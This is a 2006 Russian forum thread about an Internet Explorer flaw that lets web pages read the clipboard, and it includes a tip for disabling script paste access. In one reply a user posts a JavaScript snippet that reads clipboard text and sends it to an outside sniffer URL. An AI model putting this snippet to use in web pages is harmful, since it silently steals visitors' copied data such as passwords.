если вы используете Ie...

Discussion in 'Болталка' started by cyberlife, 21 Jun 2006.

  1. cyberlife

    cyberlife Member

    Joined:
    17 Nov 2005
    Messages:
    0
    Likes Received:
    6
    Reputations:
    1
    не знал куда закинуть....
    Если вы используете Internet Explorer, содержимое вашего буфера обмена доступно всем. Один из пользователей digg.com опубликовал ссылку на веб-сайт, на котором демонстрируется возможность получения текста, находящегося в буфере обмена пользователя браузера Microsoft Internet Explorer в момент захода на веб-сайт.

    здесь

    Этот случай лишний раз акцентрирует внимание на не безопасных настройках "по-умолчанию", которые применяет компания Microsoft в своих продуктах. Для отключения возможности получения содержимого вашего буфера обмена, во время просмотра веб-страниц необходимо отключить функцию "Allow Paste Operations via Script"("Разрешить операции вставки через сценарий"), которая находится во вкладке "Security/Безопасность->Custom Level Security/Другой..." окна настроек Internet Explorer.
    узнал здесь - http://www.uinc.ru/news/sn6056.html
     
    #1 cyberlife, 21 Jun 2006
    Last edited: 22 Jun 2006
  2. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    В жизни ие не использовал. А фича прикольная. Тырить буфер обмена.
     
  3. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Дак буфер выводится в броузере (локально), а как его содержимое переправить на сервер?
     
  4. ZaCo

    ZaCo Banned

    Joined:
    20 Jun 2005
    Messages:
    737
    Likes Received:
    336
    Reputations:
    215
    2-=lebed=- ++++++
    глупая бага на самом деле. пройдет только в связке с си
     
  5. pch

    pch Elder - Старейшина

    Joined:
    22 Oct 2005
    Messages:
    34
    Likes Received:
    41
    Reputations:
    15
    2 -=lebed=-
    А ajax на что? Если нужен только IE, то вообще всё просто:
    Code:
      var req =  new ActiveXObject("Microsoft.XMLHTTP");
      req.open("GET", "http://snifer.ru/?s="+window.clipboardData.getData("Text"), true);
      req.send(null);
    
    
     
  6. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Тот же код, только с комментами можно?
    Через Оперу не прокатывает кстати.
     
  7. cyberlife

    cyberlife Member

    Joined:
    17 Nov 2005
    Messages:
    0
    Likes Received:
    6
    Reputations:
    1
    на тему посмотри...
    зы. не сочтите за рекламу, просто здесь
    стоит мод(в самом низу) который явно показывает статистику по браузерам. что говорит о том сколько народу ездит на ослах.
     
    #7 cyberlife, 22 Jun 2006
    Last edited: 22 Jun 2006